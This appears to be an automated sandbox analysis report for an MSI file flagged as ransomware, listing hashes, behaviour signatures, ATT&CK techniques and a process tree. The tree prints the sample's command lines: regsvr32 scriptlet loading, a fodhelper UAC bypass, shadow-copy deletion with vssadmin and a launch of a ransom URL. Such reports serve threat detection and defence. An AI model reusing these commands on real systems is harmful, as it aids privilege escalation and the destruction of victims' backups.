Overview

overview

9

Static

static

MAG.msi

windows10_x64

9

Analysis

  • max time kernel
    229s
  • max time network
    252s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    23-05-2022 05:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    MAG.msi

  • Size

    96KB

  • MD5

    957d0c81c985609c580565a0323a14cd

  • SHA1

    d8d46413409a14a1ae407107016e28074c6824d5

  • SHA256

    9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be

  • SHA512

    0ff024ff07ab13e7d308429fd8906560e58610b63a7dd468f6b5b6c86221962dbc27e93090e5607104201e9cabe90b52affba54411a541f5c2f5369db231cf52

Score
9/10
ransomware

Malware Config

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 13 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2356
    • \??\c:\windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
      2⤵
      • Modifies registry class
      PID:4820
    • \??\c:\windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2832
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3888
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4316
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:3544
    • \??\c:\windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3900
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4660
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4720
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:3028
  • c:\windows\system32\sihost.exe
    sihost.exe
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2348
    • \??\c:\windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
      2⤵
      • Modifies registry class
      PID:3332
    • \??\c:\windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1928
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        • Drops file in Windows directory
        • Suspicious use of WriteProcessMemory
        PID:4788
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4824
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:4300
    • \??\c:\windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1796
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4136
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2212
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:4828
  • c:\windows\system32\taskhostw.exe
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2408
    • \??\c:\windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
      2⤵
      • Modifies registry class
      PID:2248
    • \??\c:\windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1852
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4792
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4220
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:5108
    • \??\c:\windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2268
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3532
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
          4⤵
            PID:3112
            • C:\Windows\System32\vssadmin.exe
              "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
              5⤵
              • Interacts with shadow copies
              PID:3632
    • C:\Windows\system32\msiexec.exe
      msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\MAG.msi
      1⤵
      • Enumerates connected drives
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2560
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Enumerates connected drives
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3024
      • C:\Windows\system32\srtasks.exe
        C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
        2⤵
          PID:4236
        • C:\Windows\System32\MsiExec.exe
          C:\Windows\System32\MsiExec.exe -Embedding 53CFB544B82E127F11ECB8651B1FC4E5
          2⤵
          • Modifies extensions of user files
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:4116
          • C:\Windows\System32\cmd.exe
            cmd /c "start microsoft-edge:http://f2a4cab8bmeemybio.cryless.info/meemybio^&1^&31330646^&80^&399^&2215063
            3⤵
            • Checks computer location settings
            PID:3516
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3928
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
        1⤵
        • Checks SCSI registry key(s)
        • Modifies data under HKEY_USERS
        PID:5004
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
        1⤵
        • Drops file in Windows directory
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:1016
      • C:\Windows\system32\browser_broker.exe
        C:\Windows\system32\browser_broker.exe -Embedding
        1⤵
        • Modifies Internet Explorer settings
        PID:4508
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
        • Modifies registry class
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:804
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
        • Drops file in Windows directory
        • Modifies Internet Explorer settings
        • Modifies registry class
        PID:656
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
        • Modifies registry class
        PID:428
      • C:\Windows\system32\OpenWith.exe
        C:\Windows\system32\OpenWith.exe -Embedding
        1⤵
        • Suspicious use of SetWindowsHookEx
        PID:1688
      • C:\Windows\system32\OpenWith.exe
        C:\Windows\system32\OpenWith.exe -Embedding
        1⤵
        • Suspicious use of SetWindowsHookEx
        PID:3544

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      File Deletion

      2
      T1107

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      Query Registry

      3
      T1012

      System Information Discovery

      3
      T1082

      Peripheral Device Discovery

      2
      T1120

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Inhibit System Recovery

      2
      T1490

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Public\glvt6878zb
        Filesize

        1KB

        MD5

        fe4a708f201a02075821a3adfbf46722

        SHA1

        0043a0976efb85b573fa959f7db59ff3ea751561

        SHA256

        e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893

        SHA512

        cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a

        Download Submit
      • C:\Users\Public\glvt6878zb
        Filesize

        1KB

        MD5

        fe4a708f201a02075821a3adfbf46722

        SHA1

        0043a0976efb85b573fa959f7db59ff3ea751561

        SHA256

        e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893

        SHA512

        cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a

        Download Submit
      • C:\Users\Public\glvt6878zb
        Filesize

        1KB

        MD5

        fe4a708f201a02075821a3adfbf46722

        SHA1

        0043a0976efb85b573fa959f7db59ff3ea751561

        SHA256

        e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893

        SHA512

        cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a

        Download Submit
      • C:\Users\Public\rtuvkf9dn
        Filesize

        3KB

        MD5

        9287a7c05440f4fba02ddc00bbc0d2dc

        SHA1

        d6d4fd6acec6367ab60e52025090c95b03470812

        SHA256

        27c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2

        SHA512

        522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae

        Download Submit
      • C:\Users\Public\rtuvkf9dn
        Filesize

        3KB

        MD5

        9287a7c05440f4fba02ddc00bbc0d2dc

        SHA1

        d6d4fd6acec6367ab60e52025090c95b03470812

        SHA256

        27c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2

        SHA512

        522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae

        Download Submit
      • C:\Users\Public\rtuvkf9dn
        Filesize

        3KB

        MD5

        9287a7c05440f4fba02ddc00bbc0d2dc

        SHA1

        d6d4fd6acec6367ab60e52025090c95b03470812

        SHA256

        27c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2

        SHA512

        522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae

        Download Submit
      • C:\Windows\Installer\MSIC47D.tmp
        Filesize

        52KB

        MD5

        d6959db7ef3dd8a1d7576dc07b58ac20

        SHA1

        5d61f82d962bca473eb499a97dd8bd2b0c89787d

        SHA256

        e04d0b1a3abde3e3294736ca90fb39121b7c36015e812fa903e1050dc93a2d6c

        SHA512

        e0d47ab5b67b0c0e0a5657fedf1827e6ef7e9e81bcc85afd406da1bb84a7f62b383da799f3dd864468c7ed8746731c1984ec281cd3b23396cb34eb61da5fadc1

        Download Submit
      • \??\Volume{a312788f-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{438e33c7-8242-4805-9360-9102c5446ef9}_OnDiskSnapshotProp
        Filesize

        5KB

        MD5

        a74a34ad0ddc842a7851d52688d7303f

        SHA1

        e2ec49c6093d0a1fe7c1602a3f422a0045fe02bd

        SHA256

        d91fbce6f505a982cd6c177e189ee4ccae540ad1b000db4e62790ee2d864da3c

        SHA512

        d7d8175d5057adb6546ca6fbc65505a94e64724293c73226564195ba6b098f129ebdf64f8c22cdef32002a9308f520a143c4f9544839839e3be2a22ffd307a25

        Download Submit
      • \Windows\Installer\MSIC47D.tmp
        Filesize

        52KB

        MD5

        d6959db7ef3dd8a1d7576dc07b58ac20

        SHA1

        5d61f82d962bca473eb499a97dd8bd2b0c89787d

        SHA256

        e04d0b1a3abde3e3294736ca90fb39121b7c36015e812fa903e1050dc93a2d6c

        SHA512

        e0d47ab5b67b0c0e0a5657fedf1827e6ef7e9e81bcc85afd406da1bb84a7f62b383da799f3dd864468c7ed8746731c1984ec281cd3b23396cb34eb61da5fadc1

        Download Submit
      • memory/1016-138-0x000001A6A4D20000-0x000001A6A4D30000-memory.dmp
        Filesize

        64KB

        Download
      • memory/1016-137-0x000001A6A4C20000-0x000001A6A4C30000-memory.dmp
        Filesize

        64KB

        Download
      • memory/1796-157-0x0000000000000000-mapping.dmp
        Download
      • memory/1852-143-0x0000000000000000-mapping.dmp
        Download
      • memory/1928-144-0x0000000000000000-mapping.dmp
        Download
      • memory/2212-164-0x0000000000000000-mapping.dmp
        Download
      • memory/2248-132-0x0000000000000000-mapping.dmp
        Download
      • memory/2268-159-0x0000000000000000-mapping.dmp
        Download
      • memory/2348-135-0x0000024A8B4A0000-0x0000024A8B4A3000-memory.dmp
        Filesize

        12KB

        Download
      • memory/2832-145-0x0000000000000000-mapping.dmp
        Download
      • memory/3028-165-0x0000000000000000-mapping.dmp
        Download
      • memory/3112-167-0x0000000000000000-mapping.dmp
        Download
      • memory/3332-126-0x0000000000000000-mapping.dmp
        Download
      • memory/3516-136-0x0000000000000000-mapping.dmp
        Download
      • memory/3532-162-0x0000000000000000-mapping.dmp
        Download
      • memory/3544-153-0x0000000000000000-mapping.dmp
        Download
      • memory/3632-168-0x0000000000000000-mapping.dmp
        Download
      • memory/3888-146-0x0000000000000000-mapping.dmp
        Download
      • memory/3900-158-0x0000000000000000-mapping.dmp
        Download
      • memory/4116-134-0x000001E40CA20000-0x000001E40CA2C000-memory.dmp
        Filesize

        48KB

        Download
      • memory/4116-121-0x0000000000000000-mapping.dmp
        Download
      • memory/4136-161-0x0000000000000000-mapping.dmp
        Download
      • memory/4220-151-0x0000000000000000-mapping.dmp
        Download
      • memory/4236-120-0x0000000000000000-mapping.dmp
        Download
      • memory/4300-155-0x0000000000000000-mapping.dmp
        Download
      • memory/4316-150-0x0000000000000000-mapping.dmp
        Download
      • memory/4660-160-0x0000000000000000-mapping.dmp
        Download
      • memory/4720-163-0x0000000000000000-mapping.dmp
        Download
      • memory/4788-147-0x0000000000000000-mapping.dmp
        Download
      • memory/4792-148-0x0000000000000000-mapping.dmp
        Download
      • memory/4820-129-0x0000000000000000-mapping.dmp
        Download
      • memory/4824-149-0x0000000000000000-mapping.dmp
        Download
      • memory/4828-166-0x0000000000000000-mapping.dmp
        Download
      • memory/5108-154-0x0000000000000000-mapping.dmp
        Download